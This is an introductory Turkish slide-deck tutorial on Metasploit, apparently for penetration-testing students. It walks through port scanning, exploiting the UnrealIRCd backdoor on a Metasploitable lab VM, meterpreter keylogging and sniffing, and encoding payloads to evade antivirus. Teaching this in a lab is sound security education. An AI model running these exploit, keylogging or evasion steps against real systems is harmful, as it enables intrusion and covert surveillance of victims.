8
METASPLOİT 101 YUSUF ARSLAN POLAT @yusufarslanp 1

Metasploit 101

Embed Size (px)

Citation preview

Page 1: Metasploit 101

METASPLOİT 101 YUSUF ARSLAN POLAT

@yusufarslanp

1

Page 2: Metasploit 101

Metasploit exploit kod çalıştırmak ve yazmak için kullanılan bir araçtır.Ayrıca sızma testi sırasında kullanılabilecek bir çok özellikle birlikte gelir.Ruby tabanlı ve açık kaynak kodlu bir yazılımdır. Yazının ilerleyen bölümlerde anlatıcak örnekler sanal makineler üzerinde Kali ve Metasploitable kullanılarak hazırlanmıştır.

Msfconsole

Metasploit’i kullanmak için kullanacağımız arayüz. Metasploit’in tüm özellilerini kullanmamıza izin verir. Linux shellde alıştığınız gibi otomatik tamamlama için TAB tuşunu kullanabilirsiniz. msfconsole ­h komutu ile yardım penceresine ulaşabilirsiniz.

Bundan sonrasında örneklerle devam edeceğim.

2

Page 3: Metasploit 101

Metasploit ile Port Tarama Metasploit ile port taramak için birden fazla yöntem ilki kendi auxiliary modüllerini kullanmak için bunun için msfconsole’da search portsca komutu ile ilgili moduleri listeliyebilirsiniz.Daha sonra ilgili modul aşağıdaki gibi kullanılabilir.

Burada RHOST taranacak ip araliğını,INTERFACE taranacak network kartımızı tanımlamamızı sağlar. İkinci olarak Nmap ile port tarayabilir ve sonucu Metasploit veritabınına aktarabiliriz.Nmap ile port taramak için msfconsole yi kullanabiliriz.Örneğin ; nmap ­v ­sS 192.168.2.0/24 Nmap çıktılarını Metasploit aktarmak için ilk önce veritabanı oluşturmamız gerekiyor bunun için;

msf>db_import /dosyayolu ile var olan Nmap çıktısını import edebilirsiniz. msf>db_nmap ­A 192.168.1.0/24 çıktısı ile taradıktan sonra aktarabilirsiniz. Çıktıları görmek içinde hosts komutu kullanılabilir. Metasploit ile MSSql avlama

3

Page 4: Metasploit 101

msf> set RHOSTS hedef_ip msf> exploit

Exploit Kullanımı Metasploit ile exploit kullanımı bir örnek üzerinde anlatacağım. Örnek 1:Metasploitable Not:Metasploitable ve Kali linux Host­only olarak kurulduktan sonra aşağıdaki komut ile static ip atanabilir. root@kali:~#sudo ifconfig eth0 192.168.56.100 netmask 255.255.255.0 msfadmin@metasploitable:~$sudo ifconfig eth0 192.168.56.101 netmask 255.255.255.0 Network ayarlarını yaptıktan sonra nmap ile kurban sistem taranır.Kullanabileceğimiz bir exploit belirlenir.Nmap çıktısında açık portlarda irc’yi seçtim.Daha sonra msf> search irc ile kullanabileceğimiz exploitleri listleyebiliriz.rank olarak excellent değerini verdiği için UnrealIRCD 3.2.8.1 Backdoor Command Execution kullanacağım.Bunun için yolunu kopyalıyorum. Exploite erişmek için; msf>use exploit/unix/irc/unreal_ircd_3281_backdoor Yapmamız gereken ayarlamaları görmek için show options komutunu kullanıyoruz.

4

Page 5: Metasploit 101

Burada RHORT değişkeni hedef adresle değiştirmemiz gerekiyor. msf>set RHOST 192.168.56.100 Gerekli ayarları yaptıktan sonra exploit komutu ile exploiti çalıştırabiliriz. msf>exploit Not:”back” komutu ile geri gidebilirsiniz. Not:”unset” komutu ile default değere dönebilirsiniz. Buraya kadar her şeyi doğru yaptıysanız meterpreter konsolu çalışacaktır.Artık post­explotation aşamasındayız.Elde ettiğiniz sistemle yapabileceğiniz birçok şey var.Bunlardan bir kaç örnek verelim. meterpreter>screenshot ile screenshot alabilir meterpreter>sysinfo ile sistem bilgilerini alabilirsiniz. Tuş vuruşlarını kayıt etmek için ;

1. meterpreter>ps ile sistem processlerini listeliyebilirsiniz. 2. meterpreter>migrate işlem_numarası 3. meterpreter>keyscan_start 4. meterpreter>keyscan_dump

Packet Sniffing yapmak için; meterpreter>use sniffer meterpreter>help diyerek yapmanız gereken ayarlamaları listeliyebilirsiniz. daha fazla meterpreter komutu aşağıdaki linki ziyeret edebilirsiniz. http://pentestlab.wordpress.com/2012/03/26/meterpreter­commands/

5

Page 6: Metasploit 101

AUXILIARY MODULES Auxiliary modules’i metasploit içindeki araçlar olarak tanımlasam sanırım yanlış olmaz.Ne oldukları anlamak için yakından bakalım.İlk önce tüö auxiliary modules görmek için msf>show auxiliary

Gördüğünüz gibi çeşitli kategorilerde kullanabiliceğimiz birçok araç var.Kategorilere daha yakından bakmak için search scanner/http/ gibi bir komutu kullanabilirsiniz.

MSFencode MSFencode hazırladığımız payloadları antivirüslerden saklama imkanı sağlar. msf>msfencode ­l ile mevcüt encoderları listeliyebilirsiniz.

6

Page 7: Metasploit 101

Payload yaratmak ve encode etmek için aşağıdaki komut izlenebilir.

Burada msfpayload ile nasıl payload oluşturğumuzu ve encode ettiğimizi görebilirsiniz.Ayrıca multi­encode da yapabilirsiniz.Bunun için ;

komutunu kullanabilirsiniz.

7

Page 8: Metasploit 101

Kaynaklar http://www.offensive­security.com/metasploit­unleashed/Main_Page

Metasploit: The Penetration Tester's Guide

Tavsiye https://www.corelan.be/index.php/2009/08/12/exploit­writing­tutorials­part­4­from­exploit­to­metasploit­the­basics/ http://www.bga.com.tr/calismalar/MetasploitElKitabi.pdf http://www.youtube.com/watch?v=dQdq5XpuDQ8

Akademik Bilişim 2013 Metasploit Semineri:

http://www.youtube.com/watch?v=eBd_eVuaGng

8